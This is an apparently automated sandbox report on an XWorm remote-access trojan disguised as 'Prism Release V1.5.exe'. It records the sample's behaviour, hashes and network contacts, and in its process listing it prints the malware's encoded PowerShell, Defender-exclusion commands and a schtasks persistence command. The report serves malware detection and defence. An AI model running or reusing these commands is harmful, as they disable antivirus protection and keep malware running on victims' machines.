Malware Analysis Report

2024-09-11 13:53

Sample ID 240615-nk6ccssfkl
Target Prism Release V1.5.exe
SHA256 b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001
Tags
xworm execution persistence rat trojan spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b61ca7c42fef43547c7892c76a925ec4a846373bfcde20426c913a4390f71001

Threat Level: Known bad

The file Prism Release V1.5.exe was found to be: Known bad.

Malicious Activity Summary

xworm execution persistence rat trojan spyware stealer

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Drops startup file

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-15 11:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-15 11:28

Reported

2024-06-15 11:31

Platform

win7-20240611-en

Max time kernel

145s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gdjciu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gdjciu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-39690363-730359138-1046745555-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Runtime = "C:\\ProgramData\\Windows Runtime.exe" C:\Users\Admin\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1776 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1776 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 1776 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 1776 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 1776 wrote to memory of 2624 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\dllhost.exe
PID 1776 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 1776 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 1776 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 1776 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe C:\Users\Admin\Prism Executor.exe
PID 2848 wrote to memory of 1068 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe
PID 2848 wrote to memory of 1068 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe
PID 2848 wrote to memory of 1068 N/A C:\Users\Admin\Prism Executor.exe C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe
PID 2624 wrote to memory of 3052 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 3052 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 3052 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2952 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2952 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2952 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1584 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1584 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1584 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2872 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2872 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 2872 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2624 wrote to memory of 1248 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2624 wrote to memory of 1248 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2624 wrote to memory of 1248 N/A C:\Users\Admin\dllhost.exe C:\Windows\System32\schtasks.exe
PID 2624 wrote to memory of 1648 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\gdjciu.exe
PID 2624 wrote to memory of 1648 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\gdjciu.exe
PID 2624 wrote to memory of 1648 N/A C:\Users\Admin\dllhost.exe C:\Users\Admin\AppData\Local\Temp\gdjciu.exe
PID 1648 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\gdjciu.exe C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe
PID 1648 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\gdjciu.exe C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe
PID 1648 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\gdjciu.exe C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAdABtACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAegBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIAAtACAAUgB1AG4AIABBAHMAIABBAGQAbQBpAG4AIABJAGYAIABJAG4AagBlAGMAdABpAG8AbgAgAEYAYQBpAGwAcwAnACwAJwAnACwAJwBPAEsAJwAsACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcAKQA8ACMAdQBzAGQAIwA+AA=="

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdwBhACMAPgA="

C:\Users\Admin\dllhost.exe

"C:\Users\Admin\dllhost.exe"

C:\Users\Admin\Prism Executor.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe

"C:\Users\Admin\Prism Executor.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {2615D022-5A61-4DA6-975A-027108EAFA55} S-1-5-21-39690363-730359138-1046745555-1000:EILATWEW\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\gdjciu.exe

"C:\Users\Admin\AppData\Local\Temp\gdjciu.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\gdjciu.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NL 91.92.241.69:5555 tcp

Files

\Users\Admin\dllhost.exe

MD5 4a7f75343aaa5a4d8d18add50ccf3139
SHA1 110c62eee6d7deb4aa9d601c942eae43482d2125
SHA256 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e
SHA512 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 e23363735c0f519580e12f8ecb5dbcda
SHA1 62a7a1f99283dd084ac39cb2e52cee6adeb1538d
SHA256 49dd42287c79e232da3d10eae0dedb3b5c6ffe1f5ec10ff38f6c2bc8553ae751
SHA512 175978edb1ad6bef8750379940c587eba2b2b3f17f5b2fedeac5d26a3cbd6e628dae877fa3042467d9693d45459599a10466bf890064c1a6c59fac177a06fa43

\Users\Admin\Prism Executor.exe

MD5 fa819e23d8fee4ea89aaaea55e0b28f5
SHA1 18335d4e0d140dcab66c7197c57f669251898ce5
SHA256 bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c
SHA512 e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d

memory/2624-26-0x0000000001070000-0x000000000108A000-memory.dmp

\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\nexusloader.exe

MD5 58545dc488990ac11872079d119f8284
SHA1 dade5c16834d582a5187041697cc5a7c2eae2f88
SHA256 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc
SHA512 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7

C:\Users\Admin\AppData\Local\Temp\onefile_2848_133629245258238000\python310.dll

MD5 384349987b60775d6fc3a6d202c3e1bd
SHA1 701cb80c55f859ad4a31c53aa744a00d61e467e5
SHA256 f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8
SHA512 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3052-1750-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/3052-1789-0x0000000002460000-0x0000000002468000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 832d918812ff479b6f899a4d58f3a918
SHA1 17f9f1e7775abd3a4bde5966bd8b12524ba213ca
SHA256 b87c8bc193734c49a7743837ad2f7bc6e6f4345be8a7dbfd0132c0b2b9022b30
SHA512 d1ebee513cc8acfd1e34c2d0a5a521130889e7c9409109205110dd9eff04b055820fe26a5dff754e9882da4a8a4dc9438548f9913a35d7ccdd1dc65852f9ccc6

\Users\Admin\AppData\Local\Temp\gdjciu.exe

MD5 32004d8a59efe46298e06798a1a96cb9
SHA1 da3c34b6d7d4f692e673e45dacc825b3ef17a2ed
SHA256 03ca5525ec9b76e0d61787679977fff9ed515e7c9d30100ba7d8499a8b62a47f
SHA512 34c25e4b7ec2f61c6df8da73a720a91ec01762b06be8b12308876711e6a3b44f2633b27a38f2c516ff0925cb5829b70e993167e989ceb9a328d7422f7ab41495

\Users\Admin\AppData\Local\Temp\onefile_1648_133629245954466000\svchost.exe

MD5 473d542fefe26be37736dc09341747bf
SHA1 359cadaafa2f5c032cc300a9097467de701a816c
SHA256 f88890e37c4d16601fad17152fea87947f4098ac3903f138250fa3482bd3bafc
SHA512 01c08a86156b2bc3745c62bea2a787b9635a71a61595b0ddccec976e39fc50ec1547daa15aa301f4109a6bbf99b772f1d427b14a581c5dcfc1a0651e4c79fb16

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 11:28

Reported

2024-06-15 11:31

Platform

win10v2004-20240611-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Prism Release V1.5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\dllhost.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Intel Graphics Processor.exe C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Runtime.lnk C:\Users\Admin\dllhost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\dllhost.exe N/A
N/A N/A C:\Users\Admin\Prism Executor.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\srcoob.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\ProgramData\Windows Runtime.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1564_133629245215674228\nexusloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3928_133629245969432463\svchost.exe N/A
